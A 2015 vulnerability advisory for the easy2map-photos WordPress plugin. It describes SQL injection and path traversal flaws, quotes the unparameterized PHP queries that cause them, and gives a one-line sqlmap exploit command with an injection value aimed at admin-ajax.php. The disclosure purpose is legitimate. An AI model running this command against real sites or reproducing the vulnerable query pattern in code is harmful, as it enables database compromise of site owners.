Advisory #: 130
Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
[CVE-2015-4615][CVE-2015-4617]
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in Functions.php are vulnerable to SQL injection attack because they are not parameterized or sanitizing user input. 48 $wpdb->query(sprintf("UPDATE $mapsTable 49 SET PolyLines = '%s' 50 WHERE ID = '%s';", $PolyLines, $mapID)); 218 $wpdb->query(sprintf(" 219 UPDATE $mapsTable 220 SET TemplateID = '%s', 221 MapName = '%s', 222 Settings = '%s', 223 CSSValues = '%s', 224 CSSValuesPhoto = '%s', 225 CSSValuesMap = '%s', 226 MapHTML = '%s', 227 IsActive = 1 228 WHERE ID = %s;", 229 $_REQUEST['mapTemplateName'], 230 $_REQUEST['mapName'], 231 urldecode($_REQUEST['mapSettingsXML']), 232 urldecode($_REQUEST["parentCSSXML"]), 233 urldecode($_REQUEST["photoCSSXML"]), 234 urldecode($_REQUEST["mapCSSXML"]), 235 urldecode($_REQUEST["mapHTML"]), $mapID)); 238 //this is a map insert 239 if (!$wpdb->query(sprintf(" 240 INSERT INTO $mapsTable( 241 TemplateID, 242 MapName, 243 DefaultPinImage, 244 Settings, 245 LastInvoked, 246 PolyLines, 247 CSSValues, 248 CSSValuesPhoto, 249 CSSValuesMap, 250 MapHTML, 251 IsActive 252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);", 253 $_REQUEST['mapTemplateName'], 254 $_REQUEST['mapNameâ] 331 $wpdb->query(sprintf(" 332 UPDATE $mapsTable 333 SET MapName = '%s' 334 IsActive = 1 335 WHERE ID = %s;", 336 $_REQUEST['mapName'], 337 $mapID)); , Also In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters: if (!file_exists($imagesDirectory)) { mkdir($imagesDirectory); } CVE-2015-4615 SQL Injection CVE-2015-4617 Path traversal
Export: JSON TEXT XML
Exploit Code:
  1. $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
Screen Shots:
Notes: